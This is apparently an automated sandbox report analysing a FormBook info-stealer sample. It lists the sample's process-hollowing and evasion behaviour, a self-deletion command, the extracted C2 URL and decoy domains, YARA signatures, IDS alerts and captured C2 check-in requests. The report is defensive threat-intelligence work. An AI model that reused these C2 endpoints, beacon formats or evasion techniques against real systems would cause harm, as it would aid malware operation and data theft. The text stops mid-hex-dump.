Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report divpCHa0h7.exe

Overview

General Information

Sample Name:divpCHa0h7.exe
Analysis ID:502315
MD5:fda0d823b262ac2b1bd76a2053c29692
SHA1:73f72d7c987d44d1f236c138c5617b527c5ba340
SHA256:91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • divpCHa0h7.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 5712 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 4132 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 2256 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 6732 cmdline: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.divpCHa0h7.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.divpCHa0h7.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.divpCHa0h7.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        1.2.divpCHa0h7.exe.3c268a0.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.divpCHa0h7.exe.3c268a0.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xcd2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xcd662:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf50e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf5482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd9375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x101195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xd8e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x100c81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xd9477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x101297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xd95ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x10140f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xce07a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xf5e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xd80dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xffefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xcedf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xf6c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xde867:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x106687:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xdf90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 14 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\divpCHa0h7.exe, ParentImage: C:\Users\user\Desktop\divpCHa0h7.exe, ParentProcessId: 2256, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6440

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: divpCHa0h7.exeVirustotal: Detection: 16%Perma Link
          Source: divpCHa0h7.exeReversingLabs: Detection: 17%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
          Source: 5.2.divpCHa0h7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.divpCHa0h7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: divpCHa0h7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: divpCHa0h7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
          Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.161 80
          Source: C:\Windows\explorer.exeDomain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exeDomain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.165.34.6 80
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeDomain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.floaterslaser.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 17:47:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 59389116584X-Dc: gcp-europe-west1X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 69da64d2c8f74303-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 17:47:45 GMTServer: Apache/2.4.51 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 